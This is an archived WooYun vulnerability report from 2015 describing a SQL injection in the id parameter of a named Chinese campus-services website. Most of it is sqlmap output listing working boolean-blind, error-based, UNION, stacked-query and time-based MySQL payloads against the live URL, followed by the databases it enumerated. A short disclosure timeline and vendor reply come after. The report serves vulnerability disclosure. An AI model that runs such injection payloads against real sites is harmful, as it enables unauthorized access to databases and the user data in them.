乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-29: 细节已通知厂商并且等待厂商处理中 2015-08-03: 厂商已经主动忽略漏洞,细节向公众公开
小麦公社成立于2013年,是国内发展速度最快的校园综合服务O2O平台,覆盖97个城市,在680所学校内有自建服务营业厅,是目前校园垂直O2O领域里覆盖范围最广、实体服务门店覆盖校园最多的企业。
注入点:http://www.imxiaomai.com/Join/index/id/20.html注入参数id
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://imxiaomai.com:80/Join/index/id/20) AND 6656=6656 AND (6453=6453.html Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://imxiaomai.com:80/Join/index/id/20) AND (SELECT 8896 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (CASE WHEN (8896=8896) THEN 1 ELSE 0 END)),0x716b707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6760=6760.html Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: http://imxiaomai.com:80/Join/index/id/-7694) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x6767505a51625a786473,0x716b707671),NULL,NULL,NULL#.html Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://imxiaomai.com:80/Join/index/id/20); SELECT SLEEP(5)-- .html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: http://imxiaomai.com:80/Join/index/id/20) AND (SELECT * FROM (SELECT(SLEEP(5)))ubKk) AND (3696=3696.html---web application technology: Nginxback-end DBMS: MySQL >= 5.0.0available databases [3]:[*] information_schema[*] test[*] xmgs
intval
危害等级:无影响厂商忽略
忽略时间:2015-08-03 09:26
漏洞Rank:4 (WooYun评价)
2015-08-05:非常感谢你们的指出,已经修复